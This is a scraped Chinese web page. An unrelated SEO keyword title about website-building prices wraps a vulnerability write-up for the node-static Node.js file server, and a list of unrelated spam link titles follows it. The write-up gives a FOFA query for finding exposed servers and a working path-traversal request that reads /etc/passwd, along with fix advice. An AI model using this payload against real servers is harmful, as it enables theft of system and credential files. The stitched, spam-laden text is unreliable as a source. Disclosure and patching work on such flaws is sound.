当前位置: 首页 > news >正文

百度做一个网站多少钱建网

百度做一个网站多少钱,建网,中国制造网平台,司法网站建设运营情况0x01 产品简介 node-static 是 Node.js 兼容 RFC 2616的 HTTP 静态文件服务器处理模块#xff0c;提供内置的缓存支持。 0x02 漏洞概述 node-static 存在任意文件读取漏洞#xff0c;攻击者可通过该漏洞读取系统重要文件#xff08;如数据库配置文件、系统配置文件#…0x01 产品简介 node-static 是 Node.js 兼容 RFC 2616的 HTTP 静态文件服务器处理模块提供内置的缓存支持。 0x02 漏洞概述 node-static 存在任意文件读取漏洞攻击者可通过该漏洞读取系统重要文件如数据库配置文件、系统配置文件、数据库配置文件等等导致网站处于极度不安全状态。 0x03 复现环境 FOFAheaderserver: node-static || bannerserver: node-static 0x04 漏洞复现 PoC GET /../../../../../../../../../../../etc/passwd HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip 0x05 修复建议 目前厂商已提供解决方案请关注厂商主页更新https://github.com/cloudhead/node-static 通过防火墙等安全设备设置访问策略设置白名单访问。 如非必要禁止公网访问该系统。
http://www.huolong8.cn/news/301216/

相关文章:

  • 购物类网站开发竞价托管推广多少钱
  • 淄博网站优化推广朝阳区十大互联网
  • 中卫网站推广公司制作网站的心得
  • 章贡网站建设建设机械员证书查询网站
  • 网站设计 psd百度指数有什么作用
  • 扫二维码直接进入网站怎么做网页游戏传奇世界
  • python+网站开发+prf四川网站建设
  • 营销网站都有哪些自己动手的网站
  • 网站开发的经验技巧定制包装需要多少钱
  • le网站源码哪些行业做网站的多
  • 管理网站怎么做的官网好看的公司
  • 三亚学做网站培训wordpress网站文件目录
  • 深圳网站搜索引擎优化h5动画用什么软件做
  • 知名的环保行业网站开发常德网站建设开发公司
  • 网站建设大作业选题医院咨询
  • 网站跳转至手机端如何做法语网站建设
  • 2017网站建设报价方案wordpress 文章页名称
  • 手机做兼职的网站网站落地页如何做
  • 自己建设网站需要什么服务好的网站开发
  • 中升乙源建设公司网站手工制作花朵
  • 漳州网站建设到博大赞买个网站域名要多少钱一年
  • 网站制作哪家最好关于申请网站建设经费的报告
  • 自己怎样优化网站广州网站公司推广建设
  • 装饰工程东莞网站建设生产erp管理系统app
  • 医疗室内设计网站推荐淮安高端网站制作
  • 网站访问速度 云主机wordpress最快的电商主题
  • wordpress 收费主题破解版合肥seo服务
  • 成立一个网站平台要多少钱建设网站前台费用
  • 品牌管理公司网站建设搜索引擎如何找到网站
  • 专业微信网站成都网站排名优化报价